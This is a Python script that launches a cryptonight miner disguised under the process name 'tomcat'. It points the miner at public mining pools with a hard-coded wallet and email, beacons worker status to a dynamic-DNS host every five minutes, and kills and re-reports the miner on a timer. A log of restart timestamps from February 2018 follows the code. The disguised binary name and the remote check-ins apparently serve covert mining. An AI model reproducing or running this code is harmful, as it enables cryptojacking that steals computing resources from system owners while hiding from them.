import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:59:07.531288
#2018-02-17 16:47:04.294442
#2018-02-17 18:35:02.947577
#2018-02-17 20:22:05.141645
#2018-02-17 22:09:04.878319
#2018-02-17 23:53:03.385580
#2018-02-18 01:42:07.268077
#2018-02-18 03:29:06.786808
#2018-02-18 05:17:07.296701
#2018-02-18 07:09:04.072820
#2018-02-18 08:57:04.683354
#2018-02-18 10:44:06.268394
#2018-02-18 12:28:04.108531
#2018-02-18 14:16:06.490775
#2018-02-18 16:07:01.921727
#2018-02-18 17:55:03.759986
#2018-02-18 19:41:07.185678
#2018-02-18 21:26:05.888013
#2018-02-18 23:15:07.668520
#2018-02-19 01:03:06.087416
#2018-02-19 02:50:03.726698
#2018-02-19 04:36:05.342520
#2018-02-19 06:20:07.689486
#2018-02-19 08:08:01.499515
#2018-02-19 09:57:06.575713
#2018-02-19 11:47:06.558584
#2018-02-19 13:34:04.138875
#2018-02-19 15:23:01.355993
#2018-02-19 17:10:06.957372
#2018-02-19 18:58:06.566397
#2018-02-19 20:46:05.152416
#2018-02-19 22:33:06.644099
#2018-02-20 00:18:03.916394
#2018-02-20 02:06:01.428169
#2018-02-20 03:55:08.196490
#2018-02-20 05:39:05.603604
#2018-02-20 07:24:07.247444
#2018-02-20 09:10:03.196206
#2018-02-20 10:52:07.976304
#2018-02-20 12:39:04.375572
#2018-02-20 14:25:09.432336
#2018-02-20 16:11:05.141721
#2018-02-20 17:57:02.103213
#2018-02-20 19:47:07.525899
#2018-02-20 21:34:03.733653
#2018-02-20 23:16:08.385782
#2018-02-21 01:00:02.330265
#2018-02-21 02:46:06.000604
#2018-02-21 04:35:04.930449
#2018-02-21 06:23:03.792793
#2018-02-21 08:07:06.430670
#2018-02-21 09:53:08.623103
#2018-02-21 11:42:08.648422
#2018-02-21 13:31:08.932318
#2018-02-21 15:14:05.757771
#2018-02-21 17:06:10.223510
#2018-02-21 18:53:05.309016
#2018-02-21 20:42:04.443659
#2018-02-21 22:28:08.492745
#2018-02-22 00:19:08.662363
#2018-02-22 02:06:06.962158
#2018-02-22 03:52:05.667829
#2018-02-22 05:38:06.602221
#2018-02-22 07:23:01.708768
#2018-02-22 09:11:06.045088
#2018-02-22 10:58:07.032459
#2018-02-22 12:43:09.915566
#2018-02-22 14:30:01.384677
#2018-02-22 16:16:04.506448
#2018-02-22 18:02:09.376825
#2018-02-22 19:51:07.675561
#2018-02-22 21:40:04.764341
#2018-02-22 23:27:02.158883
#2018-02-23 01:14:06.602032
#2018-02-23 03:01:02.199787
#2018-02-23 04:46:01.731908
#2018-02-23 06:31:07.152052
#2018-02-23 08:19:06.558020
#2018-02-23 10:35:01.429598
#2018-02-23 12:27:07.785835
#2018-02-23 14:15:01.487803
#2018-02-23 16:06:05.155238
#2018-02-23 17:53:08.859463
#2018-02-23 19:40:09.121437
#2018-02-23 21:23:04.099934
#2018-02-23 23:11:01.436225
#2018-02-24 00:58:02.076720
#2018-02-24 02:52:06.665569
#2018-02-24 05:29:07.419156
#2018-02-24 07:16:05.165249
#2018-02-24 09:05:08.221116
#2018-02-24 11:04:01.741192
#2018-02-24 12:52:05.816879
#2018-02-24 14:40:01.696270
#2018-02-24 16:31:04.045074
#2018-02-24 18:21:01.591022
#2018-02-24 20:07:07.362312
#2018-02-24 21:52:07.421581
#2018-02-25 00:53:01.653246
#2018-02-25 04:46:05.060911
#2018-02-25 09:00:01.951879